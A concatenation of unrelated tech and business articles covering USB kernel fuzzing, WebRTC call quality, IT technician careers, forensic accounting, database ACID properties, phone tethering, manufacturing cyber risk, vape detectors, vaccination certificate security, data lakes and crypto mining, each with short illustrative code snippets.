Peng and Payer said they reported these bugs to the Linux kernel team and suggested patches to reduce "the burden on the kernel developers while addressing the identified vulnerabilities." Of the 18 Linux bugs, 11 have received a patch since their initial reports last year, the research team said. Ten of those 11 bugs were also given a CVE, a special code assigned to major security vulnerabilities. Fixes for the remaining seven problems are also expected in the near future. "The remaining bugs fall into two classes: those still held under embargo and those discovered and documented simultaneously by other researchers," said the researchers.

USBFuzz is Open Source

Yesterday, Payer released a draft of a white paper from the research team detailing their work on USBFuzz. Peng and Payer are planning to present their research at the Usenix Security Symposium, scheduled to be held virtually in August 2020. Similar work has been done in the past: in November 2017, a security engineer from Google used a Google-made fuzzer called syzkaller to discover 79 bugs affecting USB drivers in the Linux kernel.

Peng and Payer said that USBFuzz is superior to previous tools like vUSBf, syzkaller, and usb-fuzzer because their tool gives testers more control over the test data and is also portable across operating systems, in contrast to all of the above, which usually work only on *NIX systems. Following Peng and Payer's Usenix talk, USBFuzz is expected to be published on GitHub as an open-source project.
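To show the core idea behind fuzzing in miniature, here is a toy mutation-fuzzing loop in Python. It is not USBFuzz, which works by emulating a USB device beneath real kernel drivers; the parse_packet target below is a made-up stand-in with a deliberately planted bug, included only to illustrate the mutate-run-watch-for-crashes cycle.

```python
# Toy illustration of the core fuzzing loop: mutate a seed input and
# watch the target for crashes. Real fuzzers such as USBFuzz add
# coverage feedback and, in USBFuzz's case, an emulated USB device;
# this sketch only shows the basic idea. parse_packet is a stand-in,
# not code from the USBFuzz project.
import random

def parse_packet(data: bytes) -> None:
    """Hypothetical target with a planted bug for demonstration."""
    if len(data) > 2 and data[0] == 0xFF:
        # Deliberate bug: blindly trusts a length field in the input.
        length = data[1]
        _ = data[2:2 + length][length - 1]  # IndexError if length lies

def mutate(seed: bytes) -> bytes:
    """Flip a few random bytes of the seed input."""
    data = bytearray(seed)
    for _ in range(random.randint(1, 4)):
        data[random.randrange(len(data))] = random.randrange(256)
    return bytes(data)

seed = bytes(16)  # start from an all-zero 16-byte packet
for i in range(100_000):
    sample = mutate(seed)
    try:
        parse_packet(sample)
    except Exception as exc:  # a crash means the fuzzer found a bug
        print(f"Iteration {i}: crash {exc!r} on input {sample.hex()}")
        break
```

The random mutations eventually produce an input that satisfies the buggy code path, and the crash pinpoints both the bug and a reproducing input, which is exactly the kind of evidence Peng and Payer turned into kernel bug reports.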
What is WebRTC

WebRTC (Web Real-Time Communication) is part of the technology Blitzz uses to connect two or more people on a video call. It acts as a middleman that packages and compresses data from a video session (e.g., audio created from a conversation and video captured from the webcam). An encoder compresses this data into packets, which get sent across your wifi network to whoever you're talking to. The data stream is condensed so it can be relayed across the network to your participant almost instantaneously. We refer to each party as an "Endpoint," and each sends its data stream to the other while the connection is live.

How it relates to call quality

There are a few reasons why a video session can be choppy, sound bad, or drop altogether. The data packets being sent to and from each device can get lost in transit. Packet loss is often caused by:
- High latency (the time it takes to transfer data packets between endpoints)
- Congested or inadequate bandwidth (the transfer rate at which data gets sent through your wifi network)
- A spotty connection (device too far away from the wifi source, or physical or electrical interference)

Only one participant has to have these problems for both endpoints to be affected. Each endpoint should have a stable connection to wifi and enough open bandwidth to transfer and receive data simultaneously.
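As a rough illustration of how an application might judge link health from these factors, the sketch below computes a packet loss percentage from sent and received counters and flags a degraded call. The sample counters and the 5% threshold are illustrative assumptions, not values used by Blitzz or defined by the WebRTC specification.

```python
# Illustrative sketch: judging call health from packet counters.
# The sample numbers and the 5% threshold are assumptions for the
# sake of the example, not values from any particular product.

def packet_loss_pct(sent: int, received: int) -> float:
    """Percentage of packets that never arrived at the far end."""
    if sent == 0:
        return 0.0
    return 100.0 * (sent - received) / sent

# Counters as an application might sample them during a call.
sent, received = 2_000, 1_880

loss = packet_loss_pct(sent, received)
print(f"packet loss: {loss:.1f}%")  # -> 6.0%
if loss > 5.0:
    print("Call quality degraded: consider moving closer to the "
          "wifi source or freeing up bandwidth.")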
In order to know whether or not you would like to become a computer technician, you will need to know a little more about what the IT Technician career entails. There is a continuously growing demand for professionals in this field as technology evolves and takes on an ever-increasing number of roles in modern society. Computer Repair Technician, Desktop Support, IT Technician and Support Technician are all job roles that fulfil the need for these skilled IT workers. The specific duties and responsibilities of these roles vary based on the requirements of the specific organisation, but to become a computer technician you should have the skills to fulfil tasks such as:

- Installing PC hardware
- Installing PC software
- Computer repair
- Maintaining equipment
- Providing desktop support
- Troubleshooting a vast range of computer issues
- Configuring computer networks

10 Tips to Become a Computer Technician

1. Get your CompTIA A+ Certification

One of the best foundations for a great start when you decide to become a computer technician is to gain the right qualifications. CompTIA A+ is one of the most sought-after entry-level certifications in this field, and most IT jobs require it as a basis. The course can be studied via online training, so this is a qualification that you can work towards in your own time and at your own pace. The CompTIA A+ certification is considered a standard requirement when you are looking to become a computer technician, so having it on your CV will be highly beneficial.

2. Practice Computer Repair

When you become a computer technician, a large part of your job will consist of computer repair. This is a vital part of desktop support and requires that you are able to repair PC hardware, software and accessories such as printers and scanners. As an aspiring IT Technician, you can gain a vast amount of practical experience by repairing broken computers belonging to friends and family. If you are able to, source unwanted broken computers, spend time figuring out what you can fix, and learn from what you discover.

3. Build a Computer

Although it will not necessarily be part of your job when you become a computer technician, building computers can teach you as much as computer repair can, and it is a great learning tool for those who learn through practical application. When buying the different components, you will learn about the internal structure of a computer, and this will provide a wealth of knowledge. To become a computer technician you will need to know computers in great detail, and building one from scratch is a significant learning experience.

4. Volunteer in Desktop Support

One of the quickest and easiest ways to gain the practical experience that will assist your goal to become a computer technician is to do volunteer work. Work at a local small business, a school, or wherever you can find someone in need of computer repair or other aspects of desktop support. If possible, request that each of these places write you a recommendation letter stating that you have done volunteer IT Technician work and what you did during your time with them. These letters could prove helpful when applying for a job as a computer technician.

5. Create a Search-Friendly CV

Now that you have a relevant certification or two and have added practical experience to your inventory, you need to make sure that your CV will get noticed by the recruiters who are hiring.
There is fierce competition for IT Technician roles, and recruiters are often swamped by the mass of applications they receive. This has led to the use of filtering features, and it is vital that you consider these when constructing your CV. Clearly note any IT certifications you have earned (CompTIA A+ is often used in the filtering process), mention any practical experience you have gained (even if this is simply helping your friends and family with computer repair), and do not clutter your CV with unnecessary details; interviews are where the recruiter asks for further information about the areas of your CV that have caught their attention.

6. Compile your own Guidance Database

This can prove to be a very useful resource at any time during your career as an IT Technician, and it can also help you along your path to become a computer technician. Your guidance database can consist of anything that will help you with your career: tutorial videos, helpful websites, repair manuals, self-made notes, study guides or anything else that may come in handy.

7. Accept Any IT Job Offer

With the high level of competition for positions as an IT Technician, it is advisable to accept any formal job offer that is presented to you when you are first trying to become a computer technician. This will provide you with on-the-job experience, the ability to learn more, and a paying IT Technician, Computer Repair or Desktop Support role to add to your CV.

8. Learn from other IT Technicians

Do not make the mistake of thinking that, because you have now become a computer technician, you have nothing left to learn. The field of IT is always changing and there is always something new to learn. Learning from other IT Technicians is a fantastic way to increase your knowledge and skills and enhance your career potential.

9. Maintain Professional Integrity

Once you have become a computer technician, you will begin to build your IT career from that basis. This applies whether you wish to remain in this career path or move towards a particular specialisation. Maintaining professional integrity is vital in order to develop a strong working reputation, and a sound work ethic is important both before and after you become a computer technician.

10. Work Smart

Although it is obviously important to work hard to become a computer technician and to further your career once you have gained your first IT Technician position, it is equally necessary to work smart. Focus on the areas where your weaknesses lie so that you can improve on them, and keep an eye out for areas in which you excel as potential specialist career paths.

Become a Computer Technician Today

The first step to becoming a computer technician is training. If you are considering the online study route, it is advisable to study through an accredited training provider so that you can be sure your IT Technician training is recognised and will thoroughly prepare you for the exams that will help you achieve your goal. ITonlinelearning is CompTIA accredited and will assist you with an affordable and flexible training option to get you started.
Forensic accounting is one of the least covered types of accounting because not many individuals are willing to venture into it. However, it is a very lucrative field in which practitioners can earn a six-figure salary. To understand more about this form of accounting, read on.

About Forensic Accounting

Forensic accounting is a type of accounting that helps clients uncover economic information. Its findings are used in courts of law, which is why forensic accountants are often called upon to appear in court to provide expert evidence. Because this form of accounting is so specialised, only large accounting firms and boutique firms have forensic accounting departments of their own.

Types of Forensic Accounting

There are a few branches of forensic accounting, offered chiefly by the major accounting companies.

Necessities of Forensic Accounting

Forensic accounting depends on fully understanding the company or person under investigation. The accountant therefore needs information on how much the person or company makes, the business's value in the market, and other important details. This data can be collected from financial statements, bank statements and credit statements, though any other financial document will also be helpful in this type of accounting.

Forensic accounting is an important tool for companies and individuals to ensure their compliance with their industry's best practices. Demand for it will therefore continue for as long as business operations are run.
I don’t think it’s an overstatement to say that data is pretty important, especially for modern organizations. In fact, The Economist went so far as to say that data has surpassed oil as the world’s most valuable resource, and that was back in 2017.

One of the problems with data, though, is the massive amount of it that needs to be processed on a daily basis. There’s so much data being generated across the globe these days that we had to come up with a new term just to express how much data there is: big data. Sure, it’s not the most impressive-sounding term out there, but the fact remains. With all this big data out there, organizations are seeking ways to improve how they manage it all from a practical, computational, and security standpoint. Like Spiderman’s Uncle Ben once said: “With great [data] comes great responsibility.” The best method the IT world has created for navigating the complexities of data management is the database.

What is a database?

Databases are structured sets of data that are stored within computers. Oftentimes, databases are stored on entire server farms filled with computers built specifically for handling that data and the processes necessary for making use of it. Modern databases are such complex systems that dedicated management systems have been designed to handle them. These database management systems (DBMS) optimize and manage the storage and retrieval of data within databases. One of the guiding stars leading organizations to successful database management is the ACID approach.

What is ACID?

In the context of computer science, ACID stands for:

- Atomicity
- Consistency
- Isolation
- Durability

Together, the ACID properties are a set of guiding principles that ensure database transactions are processed reliably. A database transaction is any operation performed within a database, such as creating a new record or updating data within one. Changes made within a database need to be performed with care to ensure the data within doesn’t become corrupted. Applying the ACID properties to each modification of a database is the best way to maintain its accuracy and reliability. Let’s look at each component of ACID.

Atomicity

In the context of databases, atomicity means that you either:

- Commit to the entirety of the transaction occurring
- Have no transaction at all

Essentially, an atomic transaction ensures that any commit you make finishes the entire operation successfully; in cases of a lost connection in the middle of an operation, the database is rolled back to its state prior to the commit being initiated. This is important for preventing crashes or outages from leaving a transaction partially finished in an unknown overall state. If a crash occurs during a transaction with no atomicity, you can’t know exactly how far along the process was before the transaction was interrupted. By using atomicity, you ensure that either the entire transaction completes successfully, or that none of it does.

Consistency

Consistency refers to maintaining data integrity constraints. A consistent transaction will not violate the integrity constraints placed on the data by the database rules. Enforcing consistency ensures that if a database enters an illegal state (that is, a violation of data integrity constraints occurs), the process is aborted and the changes rolled back to their previous, legal state. Another way of ensuring consistency throughout each transaction is to enforce declarative constraints placed on the database.
An example of a declarative constraint might be that all customer accounts must have a positive balance. If a transaction would bring a customer account into a negative balance, that transaction is rolled back. This ensures changes either succeed while maintaining data integrity or are canceled completely.

Isolation

Isolated transactions are considered to be “serializable,” meaning each transaction happens in a distinct order without any transactions occurring in tandem. Any reads or writes performed on the database will not be impacted by other reads and writes of separate transactions occurring on the same database. A global order is created, with each transaction queueing up in line so that each one completes in its entirety before another begins. Importantly, this doesn’t mean two operations can’t happen at the same time: multiple transactions can occur concurrently as long as they have no possibility of impacting one another. This can slow transactions down, since it may force many operations to wait before they can initiate, but the tradeoff is worth the added data security that isolation provides.

Isolation can be accomplished through a sliding scale of permissiveness that runs between what are called optimistic transactions and pessimistic transactions:

- An optimistic transaction schema assumes that other transactions will complete without reading or writing to the same place twice. Under the optimistic schema, both transactions are aborted and retried when a transaction does hit the same place twice.
- A pessimistic transaction schema provides less liberty and locks down resources on the assumption that transactions will impact one another. This results in fewer aborts and retries, but it also means that transactions are forced to wait in line for their turn more often than under the optimistic approach.

Finding a sweet spot between these two ideals is often where you’ll find the best overall result.

Durability

The final aspect of the ACID approach to database management is durability. Durability ensures that changes made to the database (transactions) that are successfully committed will survive permanently, even in the case of system failures. This ensures that the data within the database will not be corrupted by:

- Service outages
- Other cases of failure

Durability is achieved through the use of changelogs that are referenced when databases (or portions of a database) are restarted.

ACID supports data integrity & security

When every aspect of the ACID approach is brought together successfully, databases are maintained with the utmost data integrity and data security, ensuring that they continuously provide value to the organization. A database with corrupted data can present costly issues, given the huge emphasis that organizations place on their data for both day-to-day operations and strategic analysis. Using the ACID properties with your database will ensure your database continues to deliver valuable data throughout operations.
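Atomicity and the "positive balance" style of declarative constraint are easy to see in running code. The sketch below is a minimal illustration using Python's built-in sqlite3 module; the accounts table, names, and amounts are invented for the demo. The CHECK constraint plays the role of the consistency rule, and the connection's context manager provides the all-or-nothing commit/rollback behavior that atomicity describes.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
# Declarative constraint: balances may never go negative (consistency).
conn.execute("""
    CREATE TABLE accounts (
        name    TEXT PRIMARY KEY,
        balance INTEGER NOT NULL CHECK (balance >= 0)
    )
""")
conn.execute("INSERT INTO accounts VALUES ('alice', 100), ('bob', 20)")
conn.commit()


def transfer(src: str, dst: str, amount: int) -> None:
    """Move money between accounts as one atomic transaction."""
    try:
        with conn:  # BEGIN ... COMMIT, or automatic ROLLBACK on exception
            conn.execute(
                "UPDATE accounts SET balance = balance - ? WHERE name = ?",
                (amount, src),
            )
            conn.execute(
                "UPDATE accounts SET balance = balance + ? WHERE name = ?",
                (amount, dst),
            )
    except sqlite3.IntegrityError:
        print(f"transfer of {amount} from {src} rejected: would break a constraint")


transfer("bob", "alice", 50)   # fails: bob would go to -30, so nothing is applied
transfer("alice", "bob", 50)   # succeeds as a single unit
print(dict(conn.execute("SELECT name, balance FROM accounts")))
```

The first transfer is rejected as a unit: even though the debit and credit are two separate statements, neither survives, and the table is left exactly as it was.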
In today’s fast-paced world, staying connected is essential. Whether you’re working remotely, studying, or just browsing the web, a reliable internet connection is crucial. One way to ensure you’re always connected is to use your phone’s internet connection to access the web on your laptop. In this guide, we’ll show you how to connect the internet on your phone to your laptop and discuss the types of tests you can perform to ensure your connection is secure.

To share your phone’s internet connection with your laptop, you can use USB tethering, a Wi-Fi hotspot, or Bluetooth tethering. USB tethering involves connecting your phone to your laptop with a USB cable and enabling USB tethering in your phone’s settings. For a Wi-Fi hotspot, you enable the hotspot on your phone and connect your laptop to it like any other Wi-Fi network. Bluetooth tethering requires pairing your phone with your laptop via Bluetooth and enabling tethering on your phone. Once the connection is up, it’s important to perform security tests: checking your firewall settings, running an anti-virus scan, and performing a network security scan. By following these steps, you can enjoy a secure and reliable internet connection on your laptop using your phone’s internet.

Connecting the Internet from Your Phone to Your Laptop

There are several methods you can use to connect the internet on your phone to your laptop. The most common are a USB cable, a Wi-Fi hotspot, and Bluetooth. Here’s how you can do it:

- USB Tethering

To connect using a USB cable, start by ensuring your phone’s data plan supports tethering. Connect your phone to your laptop using a USB cable. On your phone, go to Settings > Network & Internet > Hotspot & tethering, and enable USB tethering. This allows your phone to share its internet connection with your laptop through the USB cable. On your laptop, a new network connection should appear, representing your phone’s internet connection. Select this network to connect; you may need to wait a few moments for the connection to be established.

USB tethering is a reliable method for connecting your phone’s internet to your laptop, especially when you need a stable connection or when Wi-Fi is unavailable. It provides a secure connection and lets you use your phone’s data plan to access the internet on your laptop. USB tethering can also be faster than some wireless methods, making it suitable for tasks that need a high-speed connection, such as streaming video or downloading large files.

- Wi-Fi Hotspot

This method creates a Wi-Fi network from your phone that your laptop can connect to:

– On your phone, go to Settings > Network & Internet > Hotspot & tethering.
– Enable the Wi-Fi hotspot option.
– On your laptop, search for available Wi-Fi networks and select your phone’s hotspot network.
– Enter the password if prompted.

- Bluetooth Tethering

To connect via Bluetooth, start by pairing your phone with your laptop. Enable Bluetooth on both devices and ensure they are discoverable. On your phone, go to Settings > Network & Internet > Hotspot & tethering, and enable Bluetooth tethering. This allows your phone to share its internet connection with your laptop via Bluetooth. On your laptop, open the Bluetooth settings and search for your phone’s Bluetooth network. Once you find it, select it to connect.
You may need to enter a passcode, which is usually displayed on your phone. Once connected, your laptop will be able to access the internet through your phone’s data connection. Bluetooth tethering is a convenient way to share your phone’s internet connection with your laptop when you don’t have access to Wi-Fi or a USB cable. It’s easy to set up and provides a secure connection between your devices.

Types of Tests to Ensure Security

Once you’ve connected your phone’s internet to your laptop, it’s important to perform some security tests to ensure your connection is secure. Here are some tests you can perform:

- Firewall Test

Check that your laptop’s firewall is enabled and configured correctly. The firewall acts as a barrier between your computer and potential threats, such as unauthorized access and malicious software. To test your firewall, you can use online tools like ShieldsUP! or GRC’s LeakTest, which check for open ports and vulnerabilities that could be exploited by hackers. By regularly testing your firewall and ensuring it is working correctly, you help protect your devices and data from cyber threats.

- Anti-virus Scan

Run a full anti-virus scan on your laptop to check for any malicious software or viruses. Make sure your anti-virus software is up to date and capable of detecting the latest threats.

- Network Security Scan

Perform a network security scan to identify vulnerabilities. Use tools like Nmap or Wireshark to check for open ports or potential security risks. These scans help ensure that your network configuration is secure, protecting your devices from potential threats while you use your phone’s connection. (For a feel for what a port scan does, see the sketch after this list.)

- Browser Security Test

Check the security settings of your web browser to ensure they are configured correctly, and disable any unnecessary plugins or extensions that could expose your browser to security risks.

- Update Software

Keep both devices up to date. Ensure your phone’s and laptop’s operating systems and applications are regularly updated; updates often include security patches that protect against vulnerabilities, helping you maintain a secure connection while accessing the internet on your laptop through your phone.
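As promised after the network security scan item, here is what a port scan actually does, reduced to a few lines of Python. This is a toy, not a substitute for Nmap: it simply attempts a TCP connection on each port and reports the ones that accept. Scan only machines you own or are explicitly authorized to test.

```python
import socket


def scan_ports(host: str, ports: range) -> list[int]:
    """Try a TCP handshake on each port; an accepted connection means 'open'."""
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(0.3)                      # keep the scan quick
            if s.connect_ex((host, port)) == 0:    # 0 means the connect succeeded
                open_ports.append(port)
    return open_ports


if __name__ == "__main__":
    # Scanning your own machine is a safe way to see which services are listening.
    print(scan_ports("127.0.0.1", range(1, 1025)))
```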
Connecting the internet from your phone to your laptop opens up a world of possibilities, allowing you to work, study, or relax online from virtually anywhere, but securing that connection is essential to protect your data and privacy. Begin by choosing a reliable method such as USB tethering, a Wi-Fi hotspot, or Bluetooth tethering: USB tethering uses a cable, a Wi-Fi hotspot creates a wireless network from your phone’s data, and Bluetooth tethering links the devices over Bluetooth. After establishing the connection, check your firewall settings, run an anti-virus scan, and conduct a network security scan to identify any vulnerabilities. Additionally, keep your web browser and operating system up to date to protect against the latest threats. By following these steps and performing these tests, you can enjoy a secure connection and peace of mind while using the internet on your laptop through your phone.

Bytagig is dedicated to providing reliable, full-scale cyber security and IT support for businesses, entrepreneurs, and startups in a variety of industries. Bytagig works remotely, with on-site support in Portland, San Diego, and Boston. Acting as internal IT staff, Bytagig handles employee desktop setup and support, comprehensive IT systems analysis, IT project management, website design, and more. Bytagig is setting the standard for MSPs, having been placed on Channel Futures’ NexGen 101 list.
Manufacturers have historically been at lower risk of cyber attack than businesses in the health and financial sectors, but that is changing with the ‘Industrial Internet of Things’. With more devices interconnected and connected to the internet, manufacturers are exposed to new levels of cyber risk. Many of these devices were not designed to withstand cyber attacks, which opens the door to threats such as:

1) Operational downtime: Cyber attackers disable production.

2) Product manipulation: Attackers can program in errors that change the way a product is produced, causing faulty products and recalls.

3) Information theft: Just two weeks ago, a US corporation accused the Chinese of stealing sensitive and proprietary manufacturing production methods, allowing them to copy proprietary material that the company produces. For secrets such as formulas, like Coca-Cola’s secret recipe, theft would have huge consequences for a company’s finances and competitive advantage.

Have you reviewed your cybersecurity to understand your level of risk? Even if you have IT resources, they are not always experienced in risk rating and remediation. We can help.
The shift from cigarettes to vaping may have health benefits, but it brings its own set of challenges. Around 4.5% of US adults vape, a number that jumps to 11% among 18- to 24-year-olds. The growth in vaping has sparked concerns about its use in public and private spaces. Despite laws against vaping in many areas, detecting it on private property poses challenges. To tackle this, businesses and facility managers are turning to vape detectors. These devices send live alerts and sound alarms, aiding in the detection and deterrence of vaping incidents.

What Are Vape Detectors?

Vape detectors are specialized sensors that pick up vaping activity in prohibited areas. These devices, which are essential in places like schools and private businesses, not only help identify vaping incidents but also act as deterrents.

How Vape Detectors Work

Vape detectors monitor air quality for chemicals and particles unique to vaping. If these particles exceed a certain threshold, the system sends alerts and can trigger an audible alarm. Types of sensors include:

- Particulate sensors, which detect aerosols from vaping.
- Gas sensors, which identify vaping-related gases.
- Combination sensors, which improve accuracy by detecting a broader range of substances.

Integrating vape sensors with security technologies like IoT devices and IP cameras can enhance detection capabilities.

The Accuracy and Sensitivity of Vape Detectors

Understanding the performance of vape detectors is crucial. They must be sensitive enough to detect the lower particulate-matter levels of vape smoke compared to cigarette smoke. Factors affecting performance include airflow, coverage area, and the potential for false positives.

The Challenge of Detecting Vaping Without Sensors

Detecting vaping without specialized sensors is difficult. Vape smoke dissipates quickly and doesn’t have a strong odor, making it hard to spot. Variations in e-cigarette models also complicate detection.

Beneficiaries of Vape Detection Systems

Several sectors can benefit from vape detection, including:

- Private businesses, to maintain a smoke-free environment.
- Educational institutions, to combat the rising trend of vaping among students.
- Residential properties, to enforce no-smoking policies.
- Healthcare facilities, to ensure a healthy environment.
- Public spaces, to comply with laws against vaping.

For property and facility managers striving to uphold vaping regulations and ensure safety, implementing a vape detection system is crucial. Through careful consideration of power sources, false-positive mitigation, vandalism prevention, coverage requirements, and integration with existing security systems, stakeholders can deploy a reliable solution. Maxxess Systems’ eFusion stands out as a valuable technology offering seamless integration capabilities, empowering stakeholders to tackle the contemporary challenge of vaping detection and deterrence. Have questions? Let’s talk!
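The threshold logic described under "How Vape Detectors Work" can be sketched in a few lines of Python. Everything here is illustrative: the threshold value, window size, and sensor readings are invented, and a real detector fuses several sensor types and is calibrated to its environment. Averaging over a small window of readings is one simple way to avoid alerting on momentary blips.

```python
from collections import deque

THRESHOLD_UG_M3 = 50.0  # hypothetical particulate threshold, in µg/m³
WINDOW = 5              # average the last 5 readings to smooth out blips


def alert_on_vape(readings):
    """Yield an alert whenever the rolling average crosses the threshold."""
    window = deque(maxlen=WINDOW)
    for t, value in enumerate(readings):
        window.append(value)
        avg = sum(window) / len(window)
        if len(window) == WINDOW and avg > THRESHOLD_UG_M3:
            yield f"t={t}: rolling average {avg:.1f} µg/m³ exceeds threshold"


# Simulated sensor feed: background air, then a vaping burst, then recovery.
feed = [8, 9, 7, 10, 9, 40, 95, 120, 110, 90, 30, 12]
for alert in alert_on_vape(feed):
    print(alert)
```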
Israel is probably the most advanced country to date in terms of COVID-19 vaccination. With more than one third of residents fully inoculated, life can almost get back to pseudo-normal. This, however, requires being able to tell vaccinated people apart from those who are not. The green pass, or vaccination certificate, is made to achieve precisely that. Technically, this government-issued certificate is not substantially different from a driver’s license, except that it is shorter-lived, can be stored in a phone app, and, most importantly, was designed in a hurry. For something launched so quickly, it seems decently architected, but slightly better work could still be done to protect a piece of attestation that is so critical to public health.

What do we require of a vaccination certificate? Not much, really. It obviously needs to be as secure as it can be made under the strict cost and distribution constraints. The certificate also has to be easily renewable (it currently expires every six months), and it has to be verifiable by a wide range of checkpoints with varying capabilities. Finally, verification has to be both reliable and fast; entry into a shopping mall cannot resemble passport control, and people cannot arbitrarily be locked out of key facilities just because of simple IT downtime.

The certificate itself is sent to its holder by e-mail (or via a web site), to be printed at home. No measure can prevent anyone with Microsoft Paint from crafting a fake of the printed page. The digital part of the vaccination certificate, i.e., the QR code printed on it, is therefore the only part of the certificate that can practically be used against forgery. See the following write-up as a quick guide to cheap-but-secure attestation certificates, for COVID or otherwise.
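The property that makes a signed QR code harder to forge than the printed page is a digital signature: the issuer signs the certificate data with a private key, and any checkpoint holding only the public key can verify it, even offline. The sketch below, written with the Python cryptography package, shows that generic idea; the payload fields, the choice of ECDSA on the P-256 curve, and the key handling are illustrative assumptions, not the actual green pass design.

```python
# pip install cryptography
from cryptography.exceptions import InvalidSignature
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import ec

# Issuer side (e.g., a health ministry): sign the certificate payload once.
private_key = ec.generate_private_key(ec.SECP256R1())
payload = b"name=J. Doe|vaccinated=2021-02-01|expires=2021-08-01"
signature = private_key.sign(payload, ec.ECDSA(hashes.SHA256()))
# payload + signature is what would be packed into the QR code.

# Verifier side (the checkpoint app): needs only the issuer's public key.
public_key = private_key.public_key()


def verify(payload: bytes, signature: bytes) -> bool:
    try:
        public_key.verify(signature, payload, ec.ECDSA(hashes.SHA256()))
        return True
    except InvalidSignature:
        return False


print(verify(payload, signature))                            # True: genuine pass
print(verify(payload.replace(b"2021", b"2022"), signature))  # False: tampered data
```

Note how the second check fails: editing even one character of the payload (say, stretching the expiry date) invalidates the signature, which is exactly the protection a home printer cannot defeat.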
Data management has become a critical aspect of modern business. One concept that has gained significant attention in recent years is the data lake. This article aims to shed light on what a data lake is, its importance, and how it compares to similar concepts like the data warehouse.

What is a data lake?

A data lake is a vast storage repository that holds large amounts of raw data in its native format until it is needed. Unlike a hierarchical data warehouse, which stores data in files or folders, a data lake uses a flat architecture. Each data element in a data lake is assigned a unique identifier and tagged with a set of extended metadata tags. When a business question arises, the data lake can be queried for relevant data, and that smaller set of data can then be analyzed to help answer the question. Data lakes are particularly useful for big data and real-time analytics, as they allow for the storage of structured, semi-structured, and unstructured data.

Who needs a data lake?

Organizations that deal with massive amounts of data can benefit significantly from a data lake. Industries like healthcare, banking, and retail, where data is continuously generated, can use data lakes to store and analyze their data. Enterprise data lakes are also becoming common in large organizations because of the scalability and flexibility they offer.

Data lake vs data warehouse

While both data lakes and data warehouses are used for storing data, they serve different purposes and have unique characteristics. A data lake, as already mentioned, stores raw, unprocessed data, allowing users to perform various types of analytics. A data warehouse, on the other hand, is a repository for structured, filtered data that has already undergone processing. Traditional and cloud data warehouses function best when answering specific, predetermined business questions, making them ideal for business intelligence activities: the data in a warehouse is already processed, cleaned, and organized, and thus readily available for creating reports and dashboards.

In contrast, data lakes can store all types of data, including unstructured and semi-structured data. They are built for broad data discovery, machine learning, and advanced analytics. They offer the flexibility to ask any question of any data, but the responsibility falls on the user to find, understand, and analyze that data. The choice between a data lake and a data warehouse therefore depends on the specific use case, the nature and volume of the data, and the analytical goals of the organization.

The value of data lakes

Preservation of data in its original format

A data lake stores raw data without any initial processing or structuring. This approach preserves data in its original form, allowing for more flexible and comprehensive analyses.

Enabling advanced analytics

Data lakes facilitate advanced analytics like machine learning and predictive analytics. With a vast volume of raw data at hand, businesses can extract meaningful insights and make data-driven decisions.

Offering versatility and scalability

Data lakes provide a highly versatile environment thanks to their ability to accommodate a wide variety of data types. They also offer scalability that traditional data storage methods often lack, making them ideal for organizations dealing with large volumes of data.

The Future of Data Lakes

Data lakes play an essential role in modern data management strategies.
Data lake solutions offer flexibility, scalability, and cost-effectiveness that traditional data storage methods often lack. As businesses continue to generate and rely on data, the importance of effective data lake solutions will only increase.
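The identifier-plus-tags model described above can be miniaturized into a few lines of Python. This is a toy for intuition only: a real data lake keeps payloads in object storage rather than a list in memory and tracks tags in a metadata catalog, but the ingest-raw-then-query-by-tag flow is the same. The sources and tag names below are invented.

```python
import uuid

data_lake = []  # stand-in for object storage


def ingest(raw: bytes, **tags) -> str:
    """Store raw data untouched, with an ID and metadata tags for later discovery."""
    record_id = str(uuid.uuid4())
    data_lake.append({"id": record_id, "tags": tags, "payload": raw})
    return record_id


def query(**wanted):
    """Find records whose tags match; analysis then runs on this smaller set."""
    return [r for r in data_lake
            if all(r["tags"].get(k) == v for k, v in wanted.items())]


ingest(b'{"hr": 72}', source="wearable", patient="p1", kind="json")
ingest(b"\x89PNG...", source="scanner", patient="p1", kind="image")
print([r["id"] for r in query(patient="p1", kind="json")])
```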
A program for generating (mining) cryptocurrency. Most cryptocurrencies are issued in a decentralized manner by creating new blocks of “money” according to certain rules, and the generation of each new unit of currency requires considerable computational resources. Miner programs consume those resources to find new hash sums, earning cryptocurrency for their owners. A miner installed on a device without the consent of its owner is malware (see Trojan miner). The name is sometimes also applied to people who engage in mining.
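The "finding new hash sums" at the heart of most mining is a brute-force search commonly called proof of work. A toy version in Python follows; the block contents and difficulty are made up, and real schemes such as Bitcoin's compare the hash against a numeric target rather than counting leading zero digits.

```python
import hashlib
from itertools import count


def mine(block_data: str, difficulty: int = 4) -> tuple[int, str]:
    """Brute-force a nonce whose SHA-256 hash starts with `difficulty` zero hex digits."""
    target = "0" * difficulty
    for nonce in count():
        digest = hashlib.sha256(f"{block_data}{nonce}".encode()).hexdigest()
        if digest.startswith(target):
            return nonce, digest


nonce, digest = mine("block #1: alice pays bob 5 coins")
print(f"nonce={nonce}  hash={digest}")  # each extra zero multiplies the work by ~16
```

The loop is why mining consumes so much computation, and why a covert miner on a victim's machine shows up as sustained CPU or GPU load.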
Mobile Technology is Shaping Humanity’s Future

Human beings have come a long way over the centuries. Throughout time, we’ve always looked for the most convenient and reliable ways to communicate, whether through drums and horns, smoke signals, letters, or in-person conversation. The rise of the digital world has given way to better opportunities for communication than ever before. Today, we can engage in conversations with people around the world, accessing real-time audio, video, and even text messaging at the touch of a button.

Technology has played a pivotal role in making society a better place. The ability to access that technology via mobile devices like tablets and smartphones has changed the way we interact with others, complete tasks, and even perform at work. According to Pew Research, more than 5 billion people around the world have a mobile device, and over half of those devices are smartphones. We’re living in an environment where it’s genuinely possible to be always on and constantly connected. The question is, what does that mean for humanity as we know it? How does mobile technology serve communities across the globe?

How Mobile Technology Transformed the Planet

The chances are that your smartphone is an everyday part of your toolkit: a lightweight device that you carry with you wherever you go, whether you’re at home or at work. Despite being small enough to fit in your pocket and light enough that you’ll barely notice it throughout the day, the smartphone has played a monumental role in shaping human interactions in the 21st century. When the iPhone launched in 2007, we had no idea how significantly the communication landscape was about to change. Mobile devices suddenly became more than just phones or reading devices. Today, our devices are catch-all platforms for education, communication, and collaboration, with functionality that is continually evolving and improving. The evolution of mobile technology means that everyone now has access to a pocket-sized PC, an environment they can turn to for information, assistance, and even emergency support. We’re beginning to discover just how valuable the smartphone can be when it comes to things like healthcare and emergency services.

The Role of Mobile Technology in Healthcare

